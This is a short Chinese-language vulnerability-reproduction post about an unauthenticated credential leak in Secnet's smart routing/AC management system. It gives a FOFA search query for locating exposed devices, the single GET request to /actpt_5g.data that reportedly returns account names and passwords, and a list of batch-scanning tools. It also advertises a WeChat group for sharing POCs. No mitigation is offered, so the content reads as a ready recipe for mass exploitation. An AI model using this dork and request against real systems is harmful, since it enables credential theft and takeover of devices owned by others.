【漏洞复现】Secnet-智能路由系统 actpt_5g.data信息泄露

0x01 产品简介

Secnet安网智能AC管理系统是广州安网通信技术有限公司(简称"安网通信")的无线AP管理系统

0x02 漏洞描述

Secnet智能路由系统 acipt 5g.data 接口存在信息泄露漏洞,未经身份验证的远程攻击者可以利用此漏洞获取系统账户名密码等重要凭据,导致系统后台权限丢失。

0x03 搜索语法

bash 复制代码
fofa:
title="安网-智能路由系统" || title=="智能路由系统" || title="安网科技-智能路由系统" || title="智能AC管理系统"

0x04 漏洞详情

bash 复制代码
GET /actpt_5g.data

0x05 工具批量

nuclei

afrog

xray

POC获取

请使用VX扫一扫加入内部POC分享圈子

相关推荐
SuperherRo2 个月前
spring综合性利用工具-SpringBootVul-GUI(五)
spring boot·spring·漏洞利用·信息泄露
华为云开发者联盟10 个月前
Prometheus配置Basic Auth进行安全防护,实现登录控制
prometheus·华为云开发者联盟·安全加密·信息泄露